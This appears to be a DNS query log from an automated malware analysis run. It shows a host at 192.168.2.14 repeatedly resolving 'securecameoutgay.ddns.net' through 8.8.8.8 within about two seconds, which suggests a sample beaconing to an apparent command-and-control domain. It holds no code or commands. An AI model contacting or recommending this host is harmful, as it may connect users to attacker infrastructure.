                                                    Oct 12, 2024 23:06:09.746603966 CEST192.168.2.148.8.8.80xd4beStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.753803968 CEST192.168.2.148.8.8.80xd4beStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.760535002 CEST192.168.2.148.8.8.80xd4beStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.767226934 CEST192.168.2.148.8.8.80xd4beStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.774009943 CEST192.168.2.148.8.8.80xd4beStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.781238079 CEST192.168.2.148.8.8.80xeeb0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.788166046 CEST192.168.2.148.8.8.80xeeb0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.795583010 CEST192.168.2.148.8.8.80xeeb0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.802339077 CEST192.168.2.148.8.8.80xeeb0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.809264898 CEST192.168.2.148.8.8.80xeeb0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.818648100 CEST192.168.2.148.8.8.80x71e6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.826066017 CEST192.168.2.148.8.8.80x71e6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.833403111 CEST192.168.2.148.8.8.80x71e6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.840089083 CEST192.168.2.148.8.8.80x71e6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.847426891 CEST192.168.2.148.8.8.80x71e6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.854351997 CEST192.168.2.148.8.8.80x42c1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.861578941 CEST192.168.2.148.8.8.80x42c1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.869064093 CEST192.168.2.148.8.8.80x42c1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.876704931 CEST192.168.2.148.8.8.80x42c1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.883400917 CEST192.168.2.148.8.8.80x42c1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.891237974 CEST192.168.2.148.8.8.80xe62fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.898050070 CEST192.168.2.148.8.8.80xe62fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.904819012 CEST192.168.2.148.8.8.80xe62fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.911896944 CEST192.168.2.148.8.8.80xe62fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.919260025 CEST192.168.2.148.8.8.80xe62fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.926695108 CEST192.168.2.148.8.8.80xfec4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.933806896 CEST192.168.2.148.8.8.80xfec4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.941327095 CEST192.168.2.148.8.8.80xfec4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.948493004 CEST192.168.2.148.8.8.80xfec4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.955847025 CEST192.168.2.148.8.8.80xfec4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.962974072 CEST192.168.2.148.8.8.80x4ea6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.970400095 CEST192.168.2.148.8.8.80x4ea6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.977986097 CEST192.168.2.148.8.8.80x4ea6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.985152960 CEST192.168.2.148.8.8.80x4ea6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.991961002 CEST192.168.2.148.8.8.80x4ea6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:09.999099970 CEST192.168.2.148.8.8.80x1c8aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.006128073 CEST192.168.2.148.8.8.80x1c8aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.012526035 CEST192.168.2.148.8.8.80x1c8aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.019054890 CEST192.168.2.148.8.8.80x1c8aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.025202036 CEST192.168.2.148.8.8.80x1c8aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.032452106 CEST192.168.2.148.8.8.80x1868Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.048999071 CEST192.168.2.148.8.8.80x1868Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.056597948 CEST192.168.2.148.8.8.80x1868Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.064419985 CEST192.168.2.148.8.8.80x1868Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.071321011 CEST192.168.2.148.8.8.80x1868Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.078187943 CEST192.168.2.148.8.8.80x23caStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.087163925 CEST192.168.2.148.8.8.80x23caStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.094924927 CEST192.168.2.148.8.8.80x23caStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.102745056 CEST192.168.2.148.8.8.80x23caStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.109013081 CEST192.168.2.148.8.8.80x23caStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.115853071 CEST192.168.2.148.8.8.80xe11Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.122540951 CEST192.168.2.148.8.8.80xe11Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.129587889 CEST192.168.2.148.8.8.80xe11Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.136615992 CEST192.168.2.148.8.8.80xe11Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.143636942 CEST192.168.2.148.8.8.80xe11Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.150557041 CEST192.168.2.148.8.8.80xaefStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.158282042 CEST192.168.2.148.8.8.80xaefStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.165468931 CEST192.168.2.148.8.8.80xaefStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.172626972 CEST192.168.2.148.8.8.80xaefStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.179836035 CEST192.168.2.148.8.8.80xaefStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.187086105 CEST192.168.2.148.8.8.80xd747Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.193833113 CEST192.168.2.148.8.8.80xd747Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.200468063 CEST192.168.2.148.8.8.80xd747Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.207488060 CEST192.168.2.148.8.8.80xd747Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.214334965 CEST192.168.2.148.8.8.80xd747Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.221276999 CEST192.168.2.148.8.8.80xc644Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.228034019 CEST192.168.2.148.8.8.80xc644Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.234616995 CEST192.168.2.148.8.8.80xc644Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.241225958 CEST192.168.2.148.8.8.80xc644Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.247876883 CEST192.168.2.148.8.8.80xc644Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.255038023 CEST192.168.2.148.8.8.80xc0edStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.262175083 CEST192.168.2.148.8.8.80xc0edStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.268954039 CEST192.168.2.148.8.8.80xc0edStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.275185108 CEST192.168.2.148.8.8.80xc0edStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.282152891 CEST192.168.2.148.8.8.80xc0edStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.288882971 CEST192.168.2.148.8.8.80x9577Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.295862913 CEST192.168.2.148.8.8.80x9577Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.302990913 CEST192.168.2.148.8.8.80x9577Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.309762001 CEST192.168.2.148.8.8.80x9577Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.316654921 CEST192.168.2.148.8.8.80x9577Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.323616028 CEST192.168.2.148.8.8.80xf08Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.330631971 CEST192.168.2.148.8.8.80xf08Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.337497950 CEST192.168.2.148.8.8.80xf08Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.344055891 CEST192.168.2.148.8.8.80xf08Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.352896929 CEST192.168.2.148.8.8.80xf08Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.359886885 CEST192.168.2.148.8.8.80x58f8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.366240025 CEST192.168.2.148.8.8.80x58f8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.372984886 CEST192.168.2.148.8.8.80x58f8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.380309105 CEST192.168.2.148.8.8.80x58f8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.387447119 CEST192.168.2.148.8.8.80x58f8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.394740105 CEST192.168.2.148.8.8.80x9402Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.401245117 CEST192.168.2.148.8.8.80x9402Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.408462048 CEST192.168.2.148.8.8.80x9402Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.415642977 CEST192.168.2.148.8.8.80x9402Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.422374010 CEST192.168.2.148.8.8.80x9402Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.429147005 CEST192.168.2.148.8.8.80x95d2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.436052084 CEST192.168.2.148.8.8.80x95d2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.443365097 CEST192.168.2.148.8.8.80x95d2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.449947119 CEST192.168.2.148.8.8.80x95d2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.456952095 CEST192.168.2.148.8.8.80x95d2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.464061022 CEST192.168.2.148.8.8.80xb28eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.471072912 CEST192.168.2.148.8.8.80xb28eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.478049040 CEST192.168.2.148.8.8.80xb28eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.485131979 CEST192.168.2.148.8.8.80xb28eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.491930962 CEST192.168.2.148.8.8.80xb28eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.498991013 CEST192.168.2.148.8.8.80xb19bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.505567074 CEST192.168.2.148.8.8.80xb19bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.513098955 CEST192.168.2.148.8.8.80xb19bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.524677038 CEST192.168.2.148.8.8.80xb19bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.531481028 CEST192.168.2.148.8.8.80xb19bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.538192987 CEST192.168.2.148.8.8.80xbf02Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.545197964 CEST192.168.2.148.8.8.80xbf02Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.551701069 CEST192.168.2.148.8.8.80xbf02Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.558496952 CEST192.168.2.148.8.8.80xbf02Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.565278053 CEST192.168.2.148.8.8.80xbf02Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.572588921 CEST192.168.2.148.8.8.80xf3beStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.580048084 CEST192.168.2.148.8.8.80xf3beStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.587052107 CEST192.168.2.148.8.8.80xf3beStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.594024897 CEST192.168.2.148.8.8.80xf3beStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.601562977 CEST192.168.2.148.8.8.80xf3beStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.609005928 CEST192.168.2.148.8.8.80x3bbdStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.615957975 CEST192.168.2.148.8.8.80x3bbdStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.622828007 CEST192.168.2.148.8.8.80x3bbdStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.629646063 CEST192.168.2.148.8.8.80x3bbdStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.636905909 CEST192.168.2.148.8.8.80x3bbdStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.643992901 CEST192.168.2.148.8.8.80x4fe9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.651415110 CEST192.168.2.148.8.8.80x4fe9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.658385038 CEST192.168.2.148.8.8.80x4fe9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.665281057 CEST192.168.2.148.8.8.80x4fe9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.672667027 CEST192.168.2.148.8.8.80x4fe9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.680381060 CEST192.168.2.148.8.8.80x30b5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.687916040 CEST192.168.2.148.8.8.80x30b5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.695476055 CEST192.168.2.148.8.8.80x30b5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.703162909 CEST192.168.2.148.8.8.80x30b5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.710730076 CEST192.168.2.148.8.8.80x30b5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.718516111 CEST192.168.2.148.8.8.80x3124Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.726066113 CEST192.168.2.148.8.8.80x3124Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.733810902 CEST192.168.2.148.8.8.80x3124Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.741811037 CEST192.168.2.148.8.8.80x3124Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.748925924 CEST192.168.2.148.8.8.80x3124Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.756481886 CEST192.168.2.148.8.8.80x7358Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.764291048 CEST192.168.2.148.8.8.80x7358Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.771971941 CEST192.168.2.148.8.8.80x7358Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.779522896 CEST192.168.2.148.8.8.80x7358Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.787061930 CEST192.168.2.148.8.8.80x7358Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.793982983 CEST192.168.2.148.8.8.80x62c1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.801048994 CEST192.168.2.148.8.8.80x62c1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.808517933 CEST192.168.2.148.8.8.80x62c1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.815737009 CEST192.168.2.148.8.8.80x62c1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.822630882 CEST192.168.2.148.8.8.80x62c1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.830113888 CEST192.168.2.148.8.8.80x692eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.837569952 CEST192.168.2.148.8.8.80x692eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.846298933 CEST192.168.2.148.8.8.80x692eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.855664015 CEST192.168.2.148.8.8.80x692eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.862581015 CEST192.168.2.148.8.8.80x692eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.870170116 CEST192.168.2.148.8.8.80x66e2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.877300978 CEST192.168.2.148.8.8.80x66e2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.884783030 CEST192.168.2.148.8.8.80x66e2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.892380953 CEST192.168.2.148.8.8.80x66e2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.899398088 CEST192.168.2.148.8.8.80x66e2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.906585932 CEST192.168.2.148.8.8.80x50a6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.914181948 CEST192.168.2.148.8.8.80x50a6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.922352076 CEST192.168.2.148.8.8.80x50a6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.929497957 CEST192.168.2.148.8.8.80x50a6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.936845064 CEST192.168.2.148.8.8.80x50a6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.944886923 CEST192.168.2.148.8.8.80x3fc6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.951989889 CEST192.168.2.148.8.8.80x3fc6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.959465981 CEST192.168.2.148.8.8.80x3fc6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.967113972 CEST192.168.2.148.8.8.80x3fc6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.974539042 CEST192.168.2.148.8.8.80x3fc6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.982351065 CEST192.168.2.148.8.8.80x82c0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.989603996 CEST192.168.2.148.8.8.80x82c0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:10.996354103 CEST192.168.2.148.8.8.80x82c0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.003077030 CEST192.168.2.148.8.8.80x82c0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.009658098 CEST192.168.2.148.8.8.80x82c0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.016809940 CEST192.168.2.148.8.8.80xa7abStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.023302078 CEST192.168.2.148.8.8.80xa7abStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.029802084 CEST192.168.2.148.8.8.80xa7abStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.036129951 CEST192.168.2.148.8.8.80xa7abStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.042901039 CEST192.168.2.148.8.8.80xa7abStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.050379038 CEST192.168.2.148.8.8.80xeeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.056957006 CEST192.168.2.148.8.8.80xeeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.063581944 CEST192.168.2.148.8.8.80xeeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.070110083 CEST192.168.2.148.8.8.80xeeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.077332020 CEST192.168.2.148.8.8.80xeeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.083990097 CEST192.168.2.148.8.8.80x4f6bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.090755939 CEST192.168.2.148.8.8.80x4f6bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
